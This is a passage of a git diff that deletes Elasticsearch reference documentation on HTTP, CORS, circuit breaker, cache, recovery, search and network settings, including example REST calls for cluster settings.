nodes. For example, if a new master node were to be -started which was unaware of the other indices in the cluster, adding the -old nodes would cause the old indices to be imported, instead of being -deleted. However there are several issues with automatic importing, and -its use is strongly discouraged in favour of the -<. - -WARNING: Losing all master nodes is a situation that should be avoided at -all costs, as it puts your cluster's metadata and data at risk. diff --git a/docs/reference/modules/http.asciidoc b/docs/reference/modules/http.asciidoc deleted file mode 100644 index b0b88f65402..00000000000 --- a/docs/reference/modules/http.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ -[[modules-http]] -=== HTTP -[[modules-http-description]] -// tag::modules-http-description-tag[] -The HTTP layer exposes {es}'s REST APIs over HTTP. Clients send HTTP requests -to a node in the cluster which either handles it locally or else passes it on -to other nodes for further processing using the <>. - -When possible, consider using {wikipedia}/Keepalive#HTTP_Keepalive[HTTP keep -alive] when connecting for better performance and try to get your favorite -client not to do {wikipedia}/Chunked_transfer_encoding[HTTP chunking]. -// end::modules-http-description-tag[] - -[http-settings] -==== HTTP settings - -The following settings can be configured for HTTP. These settings also use the common <>. - -`http.port`:: -(<>) -A bind port range. Defaults to `9200-9300`. - -`http.publish_port`:: -(<>) -The port that HTTP clients should use when -communicating with this node. Useful when a cluster node is behind a -proxy or firewall and the `http.port` is not directly addressable -from the outside. Defaults to the actual port assigned via `http.port`. - -`http.bind_host`:: -(<>) -The host address to bind the HTTP service to. Defaults to `http.host` (if set) or `network.bind_host`. - -`http.publish_host`:: -(<>) -The host address to publish for HTTP clients to connect to. Defaults to `http.host` (if set) or `network.publish_host`. - -`http.host`:: -(<>) -Used to set the `http.bind_host` and the `http.publish_host`. - -`http.max_content_length`:: -(<>) -Maximum size of an HTTP request body. Defaults to `100mb`. - -`http.max_initial_line_length`:: -(<>) -Maximum size of an HTTP URL. Defaults to `4kb`. - -`http.max_header_size`:: -(<>) -Maximum size of allowed headers. Defaults to `8kb`. - -[[http-compression]] -// tag::http-compression-tag[] -`http.compression` {ess-icon}:: -(<>) -Support for compression when possible (with Accept-Encoding). If HTTPS is enabled, defaults to `false`. Otherwise, defaults to `true`. -+ -Disabling compression for HTTPS mitigates potential security risks, such as a -{wikipedia}/BREACH[BREACH attack]. To compress HTTPS traffic, -you must explicitly set `http.compression` to `true`. -// end::http-compression-tag[] - -`http.compression_level`:: -(<>) -Defines the compression level to use for HTTP responses. Valid values are in the range of 1 (minimum compression) and 9 (maximum compression). Defaults to `3`. - -[[http-cors-enabled]] -// tag::http-cors-enabled-tag[] -`http.cors.enabled` {ess-icon}:: -(<>) -Enable or disable cross-origin resource sharing, which determines whether a browser on another origin can execute requests against {es}. Set to `true` to enable {es} to process pre-flight -{wikipedia}/Cross-origin_resource_sharing[CORS] requests. -{es} will respond to those requests with the `Access-Control-Allow-Origin` header if the `Origin` sent in the request is permitted by the `http.cors.allow-origin` list. Set to `false` (the default) to make {es} ignore the `Origin` request header, effectively disabling CORS requests because {es} will never respond with the `Access-Control-Allow-Origin` response header. -+ -NOTE: If the client does not send a pre-flight request with an `Origin` header or it does not check the response headers from the server to validate the -`Access-Control-Allow-Origin` response header, then cross-origin security is -compromised. If CORS is not enabled on {es}, the only way for the client to know is to send a pre-flight request and realize the required response headers are missing. - -// end::http-cors-enabled-tag[] - -[[http-cors-allow-origin]] -// tag::http-cors-allow-origin-tag[] -`http.cors.allow-origin` {ess-icon}:: -(<>) -Which origins to allow. If you prepend and append a forward slash (`/`) to the value, this will be treated as a regular expression, allowing you to support HTTP and HTTPs. For example, using `/https?:\/\/localhost(:[0-9]+)?/` would return the request header appropriately in both cases. Defaults to no origins allowed. -+ -IMPORTANT: A wildcard (`*`) is a valid value but is considered a security risk, as your {es} instance is open to cross origin requests from *anywhere*. - -// end::http-cors-allow-origin-tag[] - -[[http-cors-max-age]] -// tag::http-cors-max-age-tag[] -`http.cors.max-age` {ess-icon}:: -(<>) -Browsers send a "preflight" OPTIONS-request to determine CORS settings. `max-age` defines how long the result should be cached for. Defaults to `1728000` (20 days). -// end::http-cors-max-age-tag[] - -[[http-cors-allow-methods]] -// tag::http-cors-allow-methods-tag[] -`http.cors.allow-methods` {ess-icon}:: -(<>) -Which methods to allow. Defaults to `OPTIONS, HEAD, GET, POST, PUT, DELETE`. -// end::http-cors-allow-methods-tag[] - -[[http-cors-allow-headers]] -// tag::http-cors-allow-headers-tag[] -`http.cors.allow-headers` {ess-icon}:: -(<>) -Which headers to allow. Defaults to `X-Requested-With, Content-Type, Content-Length`. -// end::http-cors-allow-headers-tag[] - -[[http-cors-allow-credentials]] -// tag::http-cors-allow-credentials-tag[] -`http.cors.allow-credentials` {ess-icon}:: -(<>) -Whether the `Access-Control-Allow-Credentials` header should be returned. Defaults to `false`. -+ -NOTE: This header is only returned when the setting is set to `true`. - -// end::http-cors-allow-credentials-tag[] - -`http.detailed_errors.enabled`:: -(<>) -If `true`, enables the output of detailed error messages and stack traces in the response output. Defaults to `true`. -+ -If `false`, use the `error_trace` parameter to <> and return detailed error messages. Otherwise, only a simple message will be returned. - -`http.pipelining.max_events`:: -(<>) -The maximum number of events to be queued up in memory before an HTTP connection is closed, defaults to `10000`. - -`http.max_warning_header_count`:: -(<>) -The maximum number of warning headers in client HTTP responses. Defaults to `unbounded`. - -`http.max_warning_header_size`:: -(<>) -The maximum total size of warning headers in client HTTP responses. Defaults to `unbounded`. - -`http.tcp.no_delay`:: -(<>) -Enable or disable the {wikipedia}/Nagle%27s_algorithm[TCP no delay] -setting. Defaults to `network.tcp.no_delay`. - -`http.tcp.keep_alive`:: -(<>) -Configures the `SO_KEEPALIVE` option for this socket, which -determines whether it sends TCP keepalive probes. -Defaults to `network.tcp.keep_alive`. - -`http.tcp.keep_idle`:: -(<>) Configures the `TCP_KEEPIDLE` option for this socket, which -determines the time in seconds that a connection must be idle before -starting to send TCP keepalive probes. Defaults to `network.tcp.keep_idle`, which -uses the system default. This value cannot exceed `300` seconds. Only applicable on -Linux and macOS, and requires Java 11 or newer. - -`http.tcp.keep_interval`:: -(<>) Configures the `TCP_KEEPINTVL` option for this socket, -which determines the time in seconds between sending TCP keepalive probes. -Defaults to `network.tcp.keep_interval`, which uses the system default. -This value cannot exceed `300` seconds. Only applicable on Linux and macOS, and requires -Java 11 or newer. - -`http.tcp.keep_count`:: -(<>) Configures the `TCP_KEEPCNT` option for this socket, which -determines the number of unacknowledged TCP keepalive probes that may be -sent on a connection before it is dropped. Defaults to `network.tcp.keep_count`, -which uses the system default. Only applicable on Linux and macOS, and -requires Java 11 or newer. - -`http.tcp.reuse_address`:: -(<>) -Should an address be reused or not. Defaults to `network.tcp.reuse_address`. - -`http.tcp.send_buffer_size`:: -(<>) -The size of the TCP send buffer (specified with <>). -Defaults to `network.tcp.send_buffer_size`. - -`http.tcp.receive_buffer_size`:: -(<>) -The size of the TCP receive buffer (specified with <>). -Defaults to `network.tcp.receive_buffer_size`. - -[http-rest-request-tracer] -==== REST request tracer - -The HTTP layer has a dedicated tracer logger which, when activated, logs incoming requests. The log can be dynamically activated -by setting the level of the `org.elasticsearch.http.HttpTracer` logger to `TRACE`: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "logger.org.elasticsearch.http.HttpTracer" : "TRACE" - } -} --------------------------------------------------- - -You can also control which uris will be traced, using a set of include and exclude wildcard patterns. By default every request will be -traced. - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "http.tracer.include" : "*", - "http.tracer.exclude" : "" - } -} --------------------------------------------------- diff --git a/docs/reference/modules/indices/circuit_breaker.asciidoc b/docs/reference/modules/indices/circuit_breaker.asciidoc deleted file mode 100644 index 2fd929f85ce..00000000000 --- a/docs/reference/modules/indices/circuit_breaker.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ -[[circuit-breaker]] -=== Circuit breaker settings -[[circuit-breaker-description]] -// tag::circuit-breaker-description-tag[] -{es} contains multiple circuit breakers used to prevent operations from causing an OutOfMemoryError. Each breaker specifies a limit for how much memory it can use. Additionally, there is a parent-level breaker that specifies the total amount of memory that can be used across all breakers. - -Except where noted otherwise, these settings can be dynamically updated on a -live cluster with the <> API. -// end::circuit-breaker-description-tag[] - -[[parent-circuit-breaker]] -[discrete] -==== Parent circuit breaker - -The parent-level breaker can be configured with the following settings: - -`indices.breaker.total.use_real_memory`:: - (<>) - Determines whether the parent breaker should take real - memory usage into account (`true`) or only consider the amount that is - reserved by child circuit breakers (`false`). Defaults to `true`. - -[[indices-breaker-total-limit]] -// tag::indices-breaker-total-limit-tag[] -`indices.breaker.total.limit` {ess-icon}:: - (<>) - Starting limit for overall parent breaker. Defaults to 70% of JVM heap if - `indices.breaker.total.use_real_memory` is `false`. If `indices.breaker.total.use_real_memory` - is `true`, defaults to 95% of the JVM heap. -// end::indices-breaker-total-limit-tag[] - -[[fielddata-circuit-breaker]] -[discrete] -==== Field data circuit breaker -The field data circuit breaker estimates the heap memory required to load a -field into the <>. If loading the field would -cause the cache to exceed a predefined memory limit, the circuit breaker stops the -operation and returns an error. - -[[fielddata-circuit-breaker-limit]] -// tag::fielddata-circuit-breaker-limit-tag[] -`indices.breaker.fielddata.limit` {ess-icon}:: - (<>) - Limit for fielddata breaker. Defaults to 40% of JVM heap. -// end::fielddata-circuit-breaker-limit-tag[] - -[[fielddata-circuit-breaker-overhead]] -// tag::fielddata-circuit-breaker-overhead-tag[] -`indices.breaker.fielddata.overhead` {ess-icon}:: - (<>) - A constant that all field data estimations are multiplied with to determine a - final estimation. Defaults to `1.03`. -// end::fielddata-circuit-breaker-overhead-tag[] - -[[request-circuit-breaker]] -[discrete] -==== Request circuit breaker - -The request circuit breaker allows Elasticsearch to prevent per-request data -structures (for example, memory used for calculating aggregations during a -request) from exceeding a certain amount of memory. - -[[request-breaker-limit]] -// tag::request-breaker-limit-tag[] -`indices.breaker.request.limit` {ess-icon}:: - (<>) - Limit for request breaker, defaults to 60% of JVM heap. -// end::request-breaker-limit-tag[] - -[[request-breaker-overhead]] -// tag::request-breaker-overhead-tag[] -`indices.breaker.request.overhead` {ess-icon}:: - (<>) - A constant that all request estimations are multiplied with to determine a - final estimation. Defaults to `1`. -// end::request-breaker-overhead-tag[] - -[[in-flight-circuit-breaker]] -[discrete] -==== In flight requests circuit breaker - -The in flight requests circuit breaker allows Elasticsearch to limit the memory usage of all -currently active incoming requests on transport or HTTP level from exceeding a certain amount of -memory on a node. The memory usage is based on the content length of the request itself. This -circuit breaker also considers that memory is not only needed for representing the raw request but -also as a structured object which is reflected by default overhead. - -`network.breaker.inflight_requests.limit`:: - (<>) - Limit for in flight requests breaker, defaults to 100% of JVM heap. This means that it is bound - by the limit configured for the parent circuit breaker. - -`network.breaker.inflight_requests.overhead`:: - (<>) - A constant that all in flight requests estimations are multiplied with to determine a - final estimation. Defaults to 2. - -[[accounting-circuit-breaker]] -[discrete] -==== Accounting requests circuit breaker - -The accounting circuit breaker allows Elasticsearch to limit the memory -usage of things held in memory that are not released when a request is -completed. This includes things like the Lucene segment memory. - -`indices.breaker.accounting.limit`:: - (<>) - Limit for accounting breaker, defaults to 100% of JVM heap. This means that it is bound - by the limit configured for the parent circuit breaker. - -`indices.breaker.accounting.overhead`:: - (<>) - A constant that all accounting estimations are multiplied with to determine a - final estimation. Defaults to 1 - -[[script-compilation-circuit-breaker]] -[discrete] -==== Script compilation circuit breaker - -Slightly different than the previous memory-based circuit breaker, the script -compilation circuit breaker limits the number of inline script compilations -within a period of time. - -See the "prefer-parameters" section of the <> -documentation for more information. - -`script.context.$CONTEXT.max_compilations_rate`:: - (<>) - Limit for the number of unique dynamic scripts within a certain interval - that are allowed to be compiled for a given context. Defaults to `75/5m`, - meaning 75 every 5 minutes. diff --git a/docs/reference/modules/indices/fielddata.asciidoc b/docs/reference/modules/indices/fielddata.asciidoc deleted file mode 100644 index 1383bf74d6d..00000000000 --- a/docs/reference/modules/indices/fielddata.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[modules-fielddata]] -=== Field data cache settings - -The field data cache contains <> and <>, -which are both used to support aggregations on certain field types. -Since these are on-heap data structures, it is important to monitor the cache's use. - -[discrete] -[[fielddata-sizing]] -==== Cache size - -The entries in the cache are expensive to build, so the default behavior is -to keep the cache loaded in memory. The default cache size is unlimited, -causing the cache to grow until it reaches the limit set by the <>. This behavior can be configured. - -If the cache size limit is set, the cache will begin clearing the least-recently-updated -entries in the cache. This setting can automatically avoid the circuit breaker limit, -at the cost of rebuilding the cache as needed. - -If the circuit breaker limit is reached, further requests that increase the cache -size will be prevented. In this case you should manually <>. - -`indices.fielddata.cache.size`:: -(<>) -The max size of the field data cache, eg `38%` of node heap space, or an -absolute value, eg `12GB`. Defaults to unbounded. If you choose to set it, -it should be smaller than <> limit. - -[discrete] -[[fielddata-monitoring]] -==== Monitoring field data - -You can monitor memory usage for field data as well as the field data circuit -breaker using -the <> or the <>. diff --git a/docs/reference/modules/indices/index_management.asciidoc b/docs/reference/modules/indices/index_management.asciidoc deleted file mode 100644 index aba4833af7f..00000000000 --- a/docs/reference/modules/indices/index_management.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[index-management-settings]] -=== Index management settings - -You can use the following cluster settings to enable or disable index management -features. - -[[auto-create-index]] -// tag::auto-create-index-tag[] -`action.auto_create_index` {ess-icon}:: -(<>) -<> if it doesn't already exist and apply any configured index templates. Defaults to `true`. -// end::auto-create-index-tag[] - -[[action-destructive-requires-name]] -// tag::action-destructive-requires-name-tag[] -`action.destructive_requires_name` {ess-icon}:: -(<>) -When set to `true`, you must specify the index name to <>. It is not possible to delete all indices with `_all` or use wildcards. -// end::action-destructive-requires-name-tag[] - -[[cluster-indices-close-enable]] -// tag::cluster-indices-close-enable-tag[] -`cluster.indices.close.enable` {ess-icon}:: -(<>) -Enables <> in {es}. You might enable this setting temporarily to change the analyzer configuration for an existing index. We strongly recommend leaving this set to `false` (the default) otherwise. -+ -IMPORTANT: Closed indices are a data loss risk because they are not included when you make cluster configuration changes, such as scaling to a different capacity, failover, and many other operations. Additionally, closed indices can lead to inaccurate disk space counts. - -[[reindex-remote-whitelist]] -// tag::reindex-remote-whitelist[] -`reindex.remote.whitelist` {ess-icon}:: -(<>) -Specifies the hosts that can be <>. Expects a YAML array of `host:port` strings. Consists of a comma-delimited list of `host:port` entries. Defaults to `["\*.io:*", "\*.com:*"]`. -// end::reindex-remote-whitelist[] diff --git a/docs/reference/modules/indices/indexing_buffer.asciidoc b/docs/reference/modules/indices/indexing_buffer.asciidoc deleted file mode 100644 index 0269221f8a3..00000000000 --- a/docs/reference/modules/indices/indexing_buffer.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -[[indexing-buffer]] -=== Indexing buffer settings - -The indexing buffer is used to store newly indexed documents. When it fills -up, the documents in the buffer are written to a segment on disk. It is divided -between all shards on the node. - -The following settings are _static_ and must be configured on every data node -in the cluster: - -`indices.memory.index_buffer_size`:: -(<>) -Accepts either a percentage or a byte size value. It defaults to `10%`, -meaning that `10%` of the total heap allocated to a node will be used as the -indexing buffer size shared across all shards. - -`indices.memory.min_index_buffer_size`:: -(<>) -If the `index_buffer_size` is specified as a percentage, then this -setting can be used to specify an absolute minimum. Defaults to `48mb`. - -`indices.memory.max_index_buffer_size`:: -(<>) -If the `index_buffer_size` is specified as a percentage, then this -setting can be used to specify an absolute maximum. Defaults to unbounded. diff --git a/docs/reference/modules/indices/query_cache.asciidoc b/docs/reference/modules/indices/query_cache.asciidoc deleted file mode 100644 index 59c7e8c6ce3..00000000000 --- a/docs/reference/modules/indices/query_cache.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[[query-cache]] -=== Node query cache settings - -The results of queries used in the filter context are cached in the node query -cache for fast lookup. There is one queries cache per node that is shared by all -shards. The cache uses an LRU eviction policy: when the cache is full, the least -recently used query results are evicted to make way for new data. You cannot -inspect the contents of the query cache. - -Term queries and queries used outside of a filter context are not eligible for -caching. - -By default, the cache holds a maximum of 10000 queries in up to 10% of the total -heap space. To determine if a query is eligible for caching, {es} maintains a -query history to track occurrences. - -Caching is done on a per segment basis if a segment contains at least 10000 -documents and the segment has at least 3% of the total documents of a shard. -Because caching is per segment, merging segments can invalidate cached queries. - -The following setting is _static_ and must be configured on every data node in -the cluster: - -`indices.queries.cache.size`:: -(<>) -Controls the memory size for the filter cache. Accepts -either a percentage value, like `5%`, or an exact value, like `512mb`. Defaults to `10%`. - -[[query-cache-index-settings]] -==== Query cache index settings - -The following setting is an _index_ setting that can be configured on a -per-index basis. Can only be set at index creation time or on a -<>: - -`index.queries.cache.enabled`:: -(<>) -Controls whether to enable query caching. Accepts `true` (default) or -`false`. diff --git a/docs/reference/modules/indices/recovery.asciidoc b/docs/reference/modules/indices/recovery.asciidoc deleted file mode 100644 index b598a9b5707..00000000000 --- a/docs/reference/modules/indices/recovery.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[recovery]] -=== Index recovery settings - -Peer recovery syncs data from a primary shard to a new or existing shard copy. - -Peer recovery automatically occurs when {es}: - -* Recreates a shard lost during node failure -* Relocates a shard to another node due to a cluster rebalance or changes to the -<> - -You can view a list of in-progress and completed recoveries using the -<>. - -[discrete] -==== Recovery settings - -`indices.recovery.max_bytes_per_sec`:: -(<>) Limits total inbound and outbound -recovery traffic for each node. Applies to both peer recoveries as well -as snapshot recoveries (i.e., restores from a snapshot). Defaults to `40mb`. -+ -This limit applies to each node separately. If multiple nodes in a cluster -perform recoveries at the same time, the cluster's total recovery traffic may -exceed this limit. -+ -If this limit is too high, ongoing recoveries may consume an excess of bandwidth -and other resources, which can destabilize the cluster. -+ -This is a dynamic setting, which means you can set it in each node's -`elasticsearch.yml` config file and you can update it dynamically using the -<>. If you set it -dynamically then the same limit applies on every node in the cluster. If you do -not set it dynamically then you can set a different limit on each node, which is -useful if some of your nodes have better bandwidth than others. For example, if -you are using <> -then you may be able to give your hot nodes a higher recovery bandwidth limit -than your warm nodes. - -[discrete] -==== Expert peer recovery settings -You can use the following _expert_ setting to manage resources for peer -recoveries. - -`indices.recovery.max_concurrent_file_chunks`:: -(<>, Expert) Number of file chunk requests -sent in parallel for each recovery. Defaults to `2`. -+ -You can increase the value of this setting when the recovery of a single shard -is not reaching the traffic limit set by `indices.recovery.max_bytes_per_sec`. - -`indices.recovery.max_concurrent_operations`:: -(<>, Expert) Number of operations sent -in parallel for each recovery. Defaults to `1`. -+ -Concurrently replaying operations during recovery can be very resource-intensive -and may interfere with indexing, search, and other activities in your cluster. -Do not increase this setting without carefully verifying that your cluster has -the resources available to handle the extra load that will result. - diff --git a/docs/reference/modules/indices/request_cache.asciidoc b/docs/reference/modules/indices/request_cache.asciidoc deleted file mode 100644 index 6208f09bf08..00000000000 --- a/docs/reference/modules/indices/request_cache.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ -[[shard-request-cache]] -=== Shard request cache settings - -When a search request is run against an index or against many indices, each -involved shard executes the search locally and returns its local results to -the _coordinating node_, which combines these shard-level results into a -``global'' result set. - -The shard-level request cache module caches the local results on each shard. -This allows frequently used (and potentially heavy) search requests to return -results almost instantly. The requests cache is a very good fit for the logging -use case, where only the most recent index is being actively updated -- -results from older indices will be served directly from the cache. - -[IMPORTANT] -=================================== - -By default, the requests cache will only cache the results of search requests -where `size=0`, so it will not cache `hits`, -but it will cache `hits.total`, <>, and -<>. - -Most queries that use `now` (see <>) cannot be cached. - -Scripted queries that use the API calls which are non-deterministic, such as -`Math.random()` or `new Date()` are not cached. -=================================== - -[discrete] -==== Cache invalidation - -The cache is smart -- it keeps the same _near real-time_ promise as uncached -search. - -Cached results are invalidated automatically whenever the shard refreshes, but -only if the data in the shard has actually changed. In other words, you will -always get the same results from the cache as you would for an uncached search -request. - -The longer the refresh interval, the longer that cached entries will remain -valid. If the cache is full, the least recently used cache keys will be -evicted. - -The cache can be expired manually with the <>: - -[source,console] ------------------------- -POST /my-index-000001,my-index-000002/_cache/clear?request=true ------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -[discrete] -==== Enabling and disabling caching - -The cache is enabled by default, but can be disabled when creating a new -index as follows: - -[source,console] ------------------------------ -PUT /my-index-000001 -{ - "settings": { - "index.requests.cache.enable": false - } -} ------------------------------ - -It can also be enabled or disabled dynamically on an existing index with the -<> API: - -[source,console] ------------------------------ -PUT /my-index-000001/_settings -{ "index.requests.cache.enable": true } ------------------------------ -// TEST[continued] - - -[discrete] -==== Enabling and disabling caching per request - -The `request_cache` query-string parameter can be used to enable or disable -caching on a *per-request* basis. If set, it overrides the index-level setting: - -[source,console] ------------------------------ -GET /my-index-000001/_search?request_cache=true -{ - "size": 0, - "aggs": { - "popular_colors": { - "terms": { - "field": "colors" - } - } - } -} ------------------------------ -// TEST[continued] - -Requests where `size` is greater than 0 will not be cached even if the request cache is -enabled in the index settings. To cache these requests you will need to use the -query-string parameter detailed here. - -[discrete] -==== Cache key - -The whole JSON body is used as the cache key. This means that if the JSON -changes -- for instance if keys are output in a different order -- then the -cache key will not be recognised. - -TIP: Most JSON libraries support a _canonical_ mode which ensures that JSON -keys are always emitted in the same order. This canonical mode can be used in -the application to ensure that a request is always serialized in the same way. - -[discrete] -==== Cache settings - -The cache is managed at the node level, and has a default maximum size of `1%` -of the heap. This can be changed in the `config/elasticsearch.yml` file with: - -[source,yaml] --------------------------------- -indices.requests.cache.size: 2% --------------------------------- - -Also, you can use the +indices.requests.cache.expire+ setting to specify a TTL -for cached results, but there should be no reason to do so. Remember that -stale results are automatically invalidated when the index is refreshed. This -setting is provided for completeness' sake only. - -[discrete] -==== Monitoring cache usage - -The size of the cache (in bytes) and the number of evictions can be viewed -by index, with the <> API: - -[source,console] ------------------------- -GET /_stats/request_cache?human ------------------------- - -or by node with the <> API: - -[source,console] ------------------------- -GET /_nodes/stats/indices/request_cache?human ------------------------- diff --git a/docs/reference/modules/indices/search-settings.asciidoc b/docs/reference/modules/indices/search-settings.asciidoc deleted file mode 100644 index e35dc358cdf..00000000000 --- a/docs/reference/modules/indices/search-settings.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[search-settings]] -=== Search settings - -The following expert settings can be set to manage global search and aggregation -limits. - -[[indices-query-bool-max-clause-count]] -`indices.query.bool.max_clause_count`:: -(<>, integer) -Maximum number of clauses a Lucene BooleanQuery can contain. Defaults to `1024`. -+ -This setting limits the number of clauses a Lucene BooleanQuery can have. The -default of 1024 is quite high and should normally be sufficient. This limit does -not only affect Elasticsearchs `bool` query, but many other queries are rewritten to Lucene's -BooleanQuery internally. The limit is in place to prevent searches from becoming too large -and taking up too much CPU and memory. In case you're considering increasing this setting, -make sure you've exhausted all other options to avoid having to do this. Higher values can lead -to performance degradations and memory issues, especially in clusters with a high load or -few resources. - -[[search-settings-max-buckets]] -`search.max_buckets`:: -(<>, integer) -Maximum number of <> allowed in -a single response. Defaults to 65,535. -+ -Requests that attempt to return more than this limit will return an error. \ No newline at end of file diff --git a/docs/reference/modules/memcached.asciidoc b/docs/reference/modules/memcached.asciidoc deleted file mode 100644 index f5a6c5e1716..00000000000 --- a/docs/reference/modules/memcached.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[modules-memcached]] -== memcached - -The memcached module allows to expose *Elasticsearch* -APIs over the memcached protocol (as closely -as possible). - -It is provided as a plugin called `transport-memcached` and installing -is explained -https://github.com/elastic/elasticsearch-transport-memcached[here] -. Another option is to download the memcached plugin and placing it -under the `plugins` directory. - -The memcached protocol supports both the binary and the text protocol, -automatically detecting the correct one to use. - -[discrete] -=== Mapping REST to Memcached Protocol - -Memcached commands are mapped to REST and handled by the same generic -REST layer in Elasticsearch. Here is a list of the memcached commands -supported: - -[discrete] -==== GET - -The memcached `GET` command maps to a REST `GET`. The key used is the -URI (with parameters). The main downside is the fact that the memcached -`GET` does not allow body in the request (and `SET` does not allow to -return a result...). For this reason, most REST APIs (like search) allow -to accept the "source" as a URI parameter as well. - -[discrete] -==== SET - -The memcached `SET` command maps to a REST `POST`. The key used is the -URI (with parameters), and the body maps to the REST body. - -[discrete] -==== DELETE - -The memcached `DELETE` command maps to a REST `DELETE`. The key used is -the URI (with parameters). - -[discrete] -==== QUIT - -The memcached `QUIT` command is supported and disconnects the client. - -[discrete] -=== Settings - -The following are the settings the can be configured for memcached: - -[cols="<,<",options="header",] -|=============================================================== -|Setting |Description -|`memcached.port` |A bind port range. Defaults to `11211-11311`. -|=============================================================== - -It also uses the common -<>. - -[discrete] -=== Disable memcached - -The memcached module can be completely disabled and not started using by -setting `memcached.enabled` to `false`. By default it is enabled once it -is detected as a plugin. diff --git a/docs/reference/modules/network.asciidoc b/docs/reference/modules/network.asciidoc deleted file mode 100644 index 9f63f16eaf4..00000000000 --- a/docs/reference/modules/network.asciidoc +++ /dev/null @@ -1,198 +0,0 @@ -[[modules-network]] -=== Network settings - -Elasticsearch binds to localhost only by default. This is sufficient for you -to run a local development server (or even a development cluster, if you start -multiple nodes on the same machine), but you will need to configure some -<> in order to run a real -production cluster across multiple servers. - -[WARNING] -.Be careful with the network configuration! -============================= -Never expose an unprotected node to the public internet. -============================= - -[[common-network-settings]] -==== Commonly used network settings - -`network.host`:: -(<>) -The node will bind to this hostname or IP address and _publish_ (advertise) -this host to other nodes in the cluster. Accepts an IP address, hostname, a -<>, or an array of any combination of -these. Note that any values containing a `:` (e.g., an IPv6 address or -containing one of the <>) must be -quoted because `:` is a special character in YAML. `0.0.0.0` is an acceptable -IP address and will bind to all network interfaces. The value `0` has the -same effect as the value `0.0.0.0`. -+ -Defaults to `_local_`. - -`discovery.seed_hosts`:: -(<>) -In order to join a cluster, a node needs to know the hostname or IP address of -at least some of the other nodes in the cluster. This setting provides the -initial list of addresses this node will try to contact. Accepts IP addresses -or hostnames. If a hostname lookup resolves to multiple IP addresses then each -IP address will be used for discovery. -{wikipedia}/Round-robin_DNS[Round robin DNS] -- returning a -different IP from a list on each lookup -- can be used for discovery; non- -existent IP addresses will throw exceptions and cause another DNS lookup on the -next round of pinging (subject to <>). -+ -Defaults to `["127.0.0.1", "[::1]"]`. - -`http.port`:: -(<>) -Port to bind to for incoming HTTP requests. Accepts a single value or a range. -If a range is specified, the node will bind to the first available port in the -range. -+ -Defaults to `9200-9300`. - -`transport.port`:: -(<>) -Port to bind for communication between nodes. Accepts a single value or a -range. If a range is specified, the node will bind to the first available port -in the range. -+ -Defaults to `9300-9400`. - -[[network-interface-values]] -==== Special values for `network.host` - -The following special values may be passed to `network.host`: - -`_local_`:: - Any loopback addresses on the system, for example `127.0.0.1`. - -`_site_`:: - Any site-local addresses on the system, for example `192.168.0.1`. - -`_global_`:: - Any globally-scoped addresses on the system, for example `8.8.8.8`. - -`_[networkInterface]_`:: - Use the addresses of the network interface called `[networkInterface]`. For - example if you wish to use the addresses of an interface called `en0` then - set `network.host: _en0_`. - -[[network-interface-values-ipv4-vs-ipv6]] -===== IPv4 vs IPv6 - -These special values will work over both IPv4 and IPv6 by default, but you can -also limit this with the use of `:ipv4` of `:ipv6` specifiers. For example, -`_en0:ipv4_` would only bind to the IPv4 addresses of interface `en0`. - -[TIP] -.Discovery in the Cloud -================================ - -More special settings are available when running in the Cloud with either the -{plugins}/discovery-ec2.html[EC2 discovery plugin] or the -{plugins}/discovery-gce-network-host.html#discovery-gce-network-host[Google Compute Engine discovery plugin] -installed. - -================================ - -[[advanced-network-settings]] -==== Advanced network settings - -The `network.host` setting explained in <> -is a shortcut which sets the _bind host_ and the _publish host_ at the same -time. In advanced used cases, such as when running behind a proxy server, you -may need to set these settings to different values: - -`network.bind_host`:: -This specifies which network interface(s) a node should bind to in order to -listen for incoming requests. A node can bind to multiple interfaces, e.g. -two network cards, or a site-local address and a local address. Defaults to -`network.host`. - -`network.publish_host`:: -The publish host is the single interface that the node advertises to other nodes -in the cluster, so that those nodes can connect to it. Currently an -Elasticsearch node may be bound to multiple addresses, but only publishes one. -If not specified, this defaults to the ``best'' address from `network.host`, -sorted by IPv4/IPv6 stack preference, then by reachability. If you set a -`network.host` that results in multiple bind addresses yet rely on a specific -address for node-to-node communication, you should explicitly set -`network.publish_host`. - -Both of the above settings can be configured just like `network.host` -- they -accept IP addresses, host names, and -<>. - -[[tcp-settings]] -===== Advanced TCP settings - -Any component that uses TCP (like the <> and -<> layers) share the following settings: - -`network.tcp.no_delay`:: -(<>) -Enable or disable the {wikipedia}/Nagle%27s_algorithm[TCP no delay] -setting. Defaults to `true`. - -`network.tcp.keep_alive`:: -(<>) -Configures the `SO_KEEPALIVE` option for this socket, which -determines whether it sends TCP keepalive probes. - -`network.tcp.keep_idle`:: -(<>) -Configures the `TCP_KEEPIDLE` option for this socket, which -determines the time in seconds that a connection must be idle before -starting to send TCP keepalive probes. Defaults to `-1`, which uses -the system default. This value cannot exceed `300` seconds. Only applicable on Linux and macOS, -and requires Java 11 or newer. - -`network.tcp.keep_interval`:: -(<>) -Configures the `TCP_KEEPINTVL` option for this socket, -which determines the time in seconds between sending TCP keepalive probes. -Defaults to `-1`, which uses the system default. This value cannot exceed `300` seconds. -Only applicable on Linux and macOS, and requires Java 11 or newer. - -`network.tcp.keep_count`:: -(<>) -Configures the `TCP_KEEPCNT` option for this socket, which -determines the number of unacknowledged TCP keepalive probes that may be -sent on a connection before it is dropped. Defaults to `-1`, -which uses the system default. Only applicable on Linux and macOS, and requires -Java 11 or newer. - -`network.tcp.reuse_address`:: -(<>) -Should an address be reused or not. Defaults to `true` on non-windows -machines. - -`network.tcp.send_buffer_size`:: -(<>) -The size of the TCP send buffer (specified with <>). -By default not explicitly set. - -`network.tcp.receive_buffer_size`:: -(<>) -The size of the TCP receive buffer (specified with <>). -By default not explicitly set. - -[discrete] -=== HTTP and transport network communication - -Each {es} node uses the network for two different methods of communication: - -* it exposes an <> for use by clients. - -* it exposes a <> for communication 